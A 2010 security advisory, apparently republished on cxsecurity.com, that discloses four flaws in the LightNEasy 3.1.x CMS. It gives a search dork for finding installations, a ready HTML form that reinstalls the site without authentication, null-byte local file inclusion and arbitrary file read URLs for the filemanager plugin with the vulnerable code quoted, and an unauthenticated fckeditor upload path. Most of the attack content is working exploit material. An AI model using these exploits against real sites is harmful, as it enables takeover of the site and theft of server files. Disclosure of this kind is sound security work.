LightNEasy 3.1.x Multiple Vulnerabilites

2010-04-21 / 2010-04-22
Credit: ITSecTeam
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################################## #Title: LightNEasy 3.1.x Multiple Vulnerabilites # #Vendor: http://lightneasy.org/ # #Dork: "Powered by LightNEasy" # ############################################################################## #AUTHOR: ITSecTeam # #Email: Bug@ITSecTeam.com # #Website: http://www.itsecteam.com # #Forum : http://forum.ITSecTeam.com # #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability46.htm # #Thanks: r3dm0v3 [r3dm0v3_at_ymail.com] # ############################################################################## #DESCRIPTION (by vendor):##################################################### LightNEasy, a simple and light Content Management System and Website Builder #1-fckeditor Remote File Upload############################################### #Desc: Remote users can upload file without authentication. #POC: http://site.com/fckeditor/editor/filemanager/connectors/test.html #2-Reinstallation############################################################# #Desc: After software installation it is still possible for remote users to reinstall the software without authentication. #Exploit: <html> <form name="form1" action="http://site.com/LightNEasy/install1.php" method="post"><table> <tr><td>Enter password:</td><td><input type="password" name="password" value="" /></td></tr> <tr><td>Repeat password:</td><td><input type="password" name="password1" value="" /></td></tr> <tr><td>Admin name:</td><td><input type="text" name="admin" value="" /></td></tr> <tr><td>Admin email:</td><td><input type="text" name="email" value="" /></td></tr> <tr><td>Website email:</td><td><input type="text" name="wemail" value="" /></td></tr> <tr><td>Tables prefix:</td><td><input type="text" name="prefix" value="LNE_" /></td></tr> <tr><td>Database system:</td><td><select name="database" ><option value="SQLite2">SQLite 2 (following fields empty)</option><option value="SQLite3">SQLite 3 (following fields empty)</option><option value="MySQL">MySQL</option></select></td></tr> <tr><td>Database name:</td><td><input type="text" name="databasename" value="" /></td></tr> <tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr> <tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr> <tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr> <tr><td>&nbsp;</td><td><input type="submit" name="submit" value="Create Database" /></td></tr> </table></form> </html> #3-Filemanager plugin Local File Inclusion#################################### #Bug-file: /plugins/filemanager/get_file.php 29: if(!isset($language)) $language = 'en'; 30: include("languages/lang_$language.inc"); //<---- vulnerable line! #Exploit: http://site.com/plugins/filemanager/get_file.php?language=[file_to_include]%00 #4-Filemanager plugin Local File Disclosure################################### #Bug-File: 14: if(isset($_REQUEST['file'])) $file = $_REQUEST['file']; ... 56: readfile($file); #EXPLOIT: http://site.com/plugins/filemanager/get_file.php?file=[file_to_read]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top